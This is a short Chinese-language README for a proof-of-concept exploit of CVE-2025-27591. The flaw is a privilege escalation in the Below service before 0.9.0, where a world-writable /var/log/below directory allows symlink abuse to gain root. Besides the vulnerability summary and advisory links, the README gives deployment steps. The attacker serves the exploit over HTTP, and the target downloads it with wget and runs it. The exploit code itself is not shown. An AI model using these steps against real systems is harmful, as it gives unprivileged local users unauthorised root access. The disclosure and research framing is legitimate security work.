CVE-2025-27591 是一个权限提升漏洞,影响了低于 0.9.0 版本的 Below 服务。问题源于在 /var/log/below 目录下创建了一个全局可写目录。攻击者可以通过操作该目录中的符号链接来利用此漏洞,并有可能获取 root 权限,这对本地非特权用户构成重大安全威胁。
此概念验证代码仅用于教育和研究目的。
在编写本文时,社区中尚无该漏洞的公开 PoC。因此,我决定负责任地分享此实现,以填补这一空白,为安全研究生态系统做出贡献,并提高人们对不安全文件系统关键性质的认识。
在攻击者机器上:
1- git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2- cd CVE-2025-27591-PoC
3- python3 -m http.server 80
在易受攻击的系统上:
1- wget http:///exploit.py
2- python exploit.py
https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3